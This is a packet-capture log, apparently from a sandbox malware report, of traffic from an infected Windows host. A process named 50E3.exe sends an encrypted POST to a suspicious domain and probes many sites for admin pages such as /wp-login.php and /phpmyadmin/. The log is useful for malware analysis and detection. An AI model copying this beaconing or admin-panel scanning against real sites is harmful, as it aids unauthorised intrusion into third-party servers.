Nov 30, 2023 11:22:51.968441010 CET	217	OUT	GET /admin/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:52.169282913 CET	524	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:52 GMT Server: Apache/2.4.25 (Debian) Location: https://z-a.com/admin/ Content-Length: 279 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 2d 61 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://z-a.com/admin/">here</a>.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
284	192.168.2.4	64847	68.183.34.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:52.485409975 CET	219	OUT	GET /admin/ HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:52.661298037 CET	233	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:52 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://hul.co.uk/ Content-Length: 0 Content-Type: text/html; charset=UTF-8
Nov 30, 2023 11:22:52.925472021 CET	213	OUT	GET / HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:53.105169058 CET	1340	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:53 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://www.hul.co.uk Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:53 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=bui3ltuqrhe372nab5uroibcf2; path=/ Content-Length: 4111 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 20 79 73 6d 2f 20 2d 2d 3e 0a 3c 21 2d 2d 20 68 75 6c 2e 63 6f 2e 75 6b 20 2d 2d 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 48 55 4c 2e 63 6f 2e 75 6b 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2f 62 61 73 65 2e 63 73 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 75 6c 2e 63 6f 2e 75 6b 20 7c 20 53 65 61 72 63 68 20 66 6f 72 20 65 76 65 72 79 74 68 69 6e 67 20 68 75 6c 20 72 65 6c 61 74 65 64 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 3c 21 2d 2d 0a 09 09 66 75 6e 63 74 69 6f 6e 20 61 64 64 5f 73 65 61 72 63 68 5f 74 72 65 6e 64 73 28 6b 65 79 77 6f 72 64 73 29 0a 09 09 7b 09 0a 09 09 09 76 61 72 20 77 69 64 74 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6d 61 69 6e 5f 63 6f 6e 74 65 6e 74 27 29 2e 6f 66 66 73 65 74 57 69 64 74 68 3b 0a 09 09 09 76 61 72 20 74 72 65 6e 64 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 65 61 72 63 68 5f 74 72 65 6e 64 73 5f 66 72 61 6d 65 27 29 3b 0a 09 09 09 76 61 72 20 73 63 72 69 70 74 5f 73 72 63 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 74 72 65 6e 64 73 2f 66 65 74 63 68 43 6f 6d 70 6f 6e 65 6e 74 3f 68 6c 5c 37 35 65 6e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>... ysm/ -->... hul.co.uk --><head><title>Welcome to HUL.co.uk</title><meta http-equiv="imagetoolbar" content="no" /><link rel="stylesheet" type="text/css" href="styles/base.css" /><meta name="description" lang="en" content="hul.co.uk \| Search for everything hul related" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script type="text/javascript">...function add_search_trends(keywords){var width = document.getElementById('main_content').offsetWidth;var trends = document.getElementById('search_trends_frame');var script_src = "http://www.google.com/trends/fetchComponent?hl\75en
Nov 30, 2023 11:22:53.105207920 CET	1340	IN	Data Raw: 2d 47 42 5c 34 36 71 5c 37 35 22 2b 6b 65 79 77 6f 72 64 73 2b 22 5c 34 36 67 65 6f 5c 37 35 47 42 5c 34 36 63 6d 70 74 5c 37 35 71 5c 34 36 63 6f 6e 74 65 6e 74 5c 30 37 35 31 5c 34 36 63 69 64 5c 37 35 54 49 4d 45 53 45 52 49 45 53 5f 47 52 41 Data Ascii: -GB\46q\75"+keywords+"\46geo\75GB\46cmpt\75q\46content\0751\46cid\75TIMESERIES_GRAPH_0\46export\0755\46w\075"+width+"\46h\075360";trends.setAttribute('src', script_src);trends.setAttribute('width',width);return false;}--></
Nov 30, 2023 11:22:53.105259895 CET	1340	IN	Data Raw: 65 20 66 6f 72 20 73 61 6c 65 20 6f 72 20 6c 65 61 73 65 3c 2f 61 3e 3c 2f 68 32 3e 0a 09 09 09 09 09 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 48 55 4c 2e 63 6f 2e 75 6b 2c 20 70 6c 65 61 73 65 20 63 6c Data Ascii: e for sale or lease</a></h2><p>If you are interested in HUL.co.uk, please click <a href="/buy-this-domain.php">here</a> to find out more</p></div><div style="clear: both;"></div><div style="clear: both;"></div>
Nov 30, 2023 11:22:53.105298996 CET	735	IN	Data Raw: 3d 22 73 75 62 6d 69 74 22 20 76 61 6c 75 65 3d 22 53 75 62 6d 69 74 20 26 72 61 71 75 6f 3b 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 09 09 0a 09 3c 2f Data Ascii: ="submit" value="Submit »"></div></div><div class="clear"></div></fieldset></form></div><br/></div> ... notice-beige --></div> ... content --></div> ... bd --><div class="clear"></div><di

Session ID	Source IP	Source Port	Destination IP	Destination Port
285	192.168.2.4	64843	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:53.447428942 CET	216	OUT	GET /admin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:53.628989935 CET	437	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:53 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
286	192.168.2.4	65452	68.183.34.12	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:53.803071022 CET	217	OUT	GET / HTTP/1.1 Host: www.hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:53.984730959 CET	1340	IN	HTTP/1.1 200 OK Date: Thu, 30 Nov 2023 10:22:53 GMT Server: Apache/2.4.57 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:53 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=sh8uclh22e0c7rjdupk6u5ss02; path=/ Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1625 Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 57 5b 53 db 38 14 7e 4e 7e 85 ea 87 02 d3 3a 26 b0 bd 0c 24 d9 6d 21 a5 cc 50 ca 94 30 dd 9d e9 8c 47 b6 e5 58 45 96 8c 24 13 32 db fd ef 7b 74 b1 e3 00 29 30 6d a2 cb b9 7c e7 e8 dc 32 7a 71 fc f5 68 f6 cf c5 14 15 ba 64 e8 e2 ea e3 d9 e9 11 0a c2 28 fa be 7f 14 45 c7 b3 63 f4 f7 e7 d9 97 33 34 1c ec a2 4b 2d 69 aa a3 68 7a 1e a0 a0 d0 ba 3a 88 a2 c5 62 31 58 ec 0f 84 9c 47 b3 6f d1 9d 91 32 34 6c 7e 19 2a cb 33 c8 74 16 4c fa 23 73 36 e9 f7 47 2f c2 10 2d 55 19 a1 30 9c b8 5d 51 b3 41 2a 06 f5 b5 3d 02 4a 82 b3 49 bf 37 d2 54 33 32 f9 4e 58 2a 4a 82 b4 40 9f af ce 1c e1 28 72 77 40 54 12 8d 91 01 14 92 9b 9a de 8e 03 5a e2 39 d1 42 b0 04 cb 00 a5 82 6b c2 f5 38 e0 22 40 91 61 60 94 5f 23 49 d8 38 50 7a c9 88 2a 08 d1 01 d2 cb 8a 8c 03 4d ee 74 94 2a 15 a0 42 92 bc a1 88 12 ac c8 c0 1e 47 ad 4a 8e 4b 60 c8 88 4a 25 ad 34 15 3c 40 0c f3 f9 38 20 bc a3 75 65 da 2f 74 49 b0 4c 0b 94 0b 89 c8 2d 91 4b 5d 50 3e 37 c6 1b 34 58 93 ac 2b be 6b d1 85 c4 f3 12 af d9 12 a6 38 2d c8 26 86 e9 5d 45 25 51 1d 8e 70 b8 89 f6 c8 91 84 33 70 40 87 c1 7a c2 3c d9 21 4a 0b 2c 15 d1 e3 ab d9 a7 f0 bd 17 e3 ac ee 7a ed 27 be c5 ee 14 1e bb d7 33 0f 0b 5f 79 cd 53 e3 1c 84 b3 2c 56 d6 01 b1 96 84 67 6a fb 9a 2c 17 42 66 6a 07 c8 fe ed c1 47 ef 16 4b b4 a0 99 2e d0 18 65 22 ad 4b 40 32 80 b7 9c 32 62 96 1f 97 a7 d9 f6 56 89 29 8f 3d cc ad 9d 81 c8 73 c0 f6 dd 70 1d 36 32 9c 82 df 09 59 43 12 e7 12 de 72 6b a7 e5 77 66 c4 4a a6 20 a3 1b ec 73 21 e6 0c 22 41 94 91 63 8d 72 a2 d3 e2 48 94 95 e0 20 fc cf 82 fd 78 f7 86 f0 f0 e4 e3 8f 3f de de c0 3a 78 d5 98 f9 2a 80 a3 39 11 70 68 6f d3 b2 d2 b0 be 31 4b 67 cd 8f dd 77 6f 86 66 4b 33 b8 98 9d 7e 99 5e 4e bf 9d 4e 2f e3 93 6f 1f 2e 3e c7 bb 70 45 ee 2a 21 2d e1 1b d8 2d cc 22 78 65 5d 66 c5 17 e6 60 ff ed 6e 60 4d 71 10 07 e0 9e 0f 1a 32 31 a9 35 01 cb 65 ba f5 ba 63 e1 ce 66 52 2b 77 eb b5 fd 72 64 92 e8 5a 72 94 63 a6 88 39 f8 0f fe 9b 94 ed 8d 22 27 f1 e9 d0 e8 ad 11 f7 47 91 4b f6 51 22 b2 25 12 fc 4c e0 0c b2 aa 79 37 35 1c dc 0c 72 d8 a9 ed 9d 60 32 ca e8 2d a2 70 bf 90 b8 aa 88 34 81 66 cf 52 86 95 82 64 cb 5c e8 35 64 73 2a 71 9e 93 38 c1 9c 3b 6a b8 2c 86 93 11 f6 e9 1d 05 93 4e 49 c1 93 97 3c 51 d5 61 f7 33 59 02 c2 a1 e3 6c b8 ba 01 e1 34 38 09 00 90 96 73 04 4e f5 45 48 45 0d 02 26 e6 02 88 f3 00 61 06 c9 75 b2 c6 b6 86 d5 50 9a 1c 33 70 8c 2d 11 18 b3 66 14 c7 b7 b1 a9 6c 16 53 af 73 61 ea 9a 6a 8f db 2b ef 1b 73 1b 53 4d ca 2e ca c8 c3 34 32 29 cf c8 5d 9c d6 52 da 84 69 b1 16 50 7b 1d 20 8f 64 ed 6f 93 8a c6 57 49 bd 0c a1 Data Ascii: W[S8~N~:&$m!P0GXE$2{t)0m\|2zqhd(Ec34K-ihz:b1XGo24l~3tL#s6G/-U0]QA=JI7T32NXJ@(rw@TZ9Bk8"@a`_#I8PzMtBGJK`J%4<@8 ue/tIL-K]P>74X+k8-&]E%Qp3p@z<!J,z'3_yS,Vgj,BfjGK.e"K@22bV)=sp62YCrkwfJ s!"AcrH x?:x9pho1KgwofK3~^NN/o.>pE!--"xe]f`n`Mq215ecfR+wrdZrc9"'GKQ"%Ly75r`2-p4fRd\5dsq8;j,NI<Qa3Yl48sNEHE&auP3p-flSsaj+sSM.42)]RiP{ doWI
Nov 30, 2023 11:22:53.984755039 CET	833	IN	Data Raw: ce a9 30 13 26 71 07 55 51 6d 02 70 9f 74 05 01 6e 90 b9 41 ee a6 71 cf 23 88 56 ee f2 0b ff dd 6f a2 d2 6a 7d 90 d1 21 e6 98 2d 35 4d 95 cd ed 1a 6a 03 00 f8 a9 82 8d 05 6e 15 c3 4f 95 42 84 e2 1a a7 29 98 71 f5 21 1c be df df 1b be 7b 0b d5 f8 Data Ascii: 0&qUQmptnAq#Voj}!-5MjnOB)q!{.&sbqm\808&ron#CI9b>;'rzlzpmu&:jrkA#FhzV(D-f\!5*9Zhc<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
287	192.168.2.4	58075	91.215.85.17	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:11.717700958 CET	332	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ddllojvibux.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Nov 30, 2023 11:23:11.717700958 CET	163	OUT	Data Raw: 48 9d fe ca 4c 65 53 54 5d 07 54 20 7b dc 25 cf 28 1b ee 15 f9 15 dd af c6 19 a3 f0 72 f4 d7 e4 f8 a9 8e c3 04 42 92 c7 a4 5b 6a 7e 83 8a fc 12 f0 5f 3d 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HLeST]T {%(rB[j~_=;}f=B!bONfy&5c50
Nov 30, 2023 11:23:11.969742060 CET	248	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 30 Nov 2023 10:23:11 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port
288	192.168.2.4	63873	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:22.247560024 CET	224	OUT	GET /administrator/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:22.429371119 CET	445	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:22 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/administrator/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Nov 30, 2023 11:23:23.239499092 CET	273	OUT	GET /administrator/index.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://gco.uk/administrator/
Nov 30, 2023 11:23:23.419359922 CET	454	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:23 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/administrator/index.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
289	192.168.2.4	65058	64.190.63.111	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:22.641098976 CET	226	OUT	GET /administrator/ HTTP/1.1 Host: qoil.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:22.831756115 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:22 GMT content-length: 0 server: NginX
Nov 30, 2023 11:23:22.831974030 CET	276	OUT	GET /administrator/index.php HTTP/1.1 Host: qoil.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://qoil.com/administrator/
Nov 30, 2023 11:23:23.022502899 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:22 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port
290	192.168.2.4	49261	213.171.212.244	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:22.887110949 CET	221	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:23.066062927 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:22 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpmyadmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
291	192.168.2.4	50057	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:23.289938927 CET	224	OUT	GET /wp-login.php HTTP/1.1 Host: qoil.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:23.480556965 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:23 GMT content-length: 0 server: NginX
Nov 30, 2023 11:23:23.480932951 CET	260	OUT	GET /wp-admin/ HTTP/1.1 Host: qoil.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://qoil.com/wp-login.php
Nov 30, 2023 11:23:23.671088934 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:23 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
292	192.168.2.4	51029	64.190.63.111	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:23.917376995 CET	221	OUT	GET /admin.php HTTP/1.1 Host: qoil.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:24.108871937 CET	142	IN	HTTP/1.1 439 date: Thu, 30 Nov 2023 10:23:24 GMT content-length: 0 server: NginX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
293	192.168.2.4	51455	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:24.129231930 CET	221	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:23:24.310247898 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:23:24 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/phpMyAdmin/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
294	192.168.2.4	51801	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:23:24.281358004 CET	224	OUT	GET /administrator/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
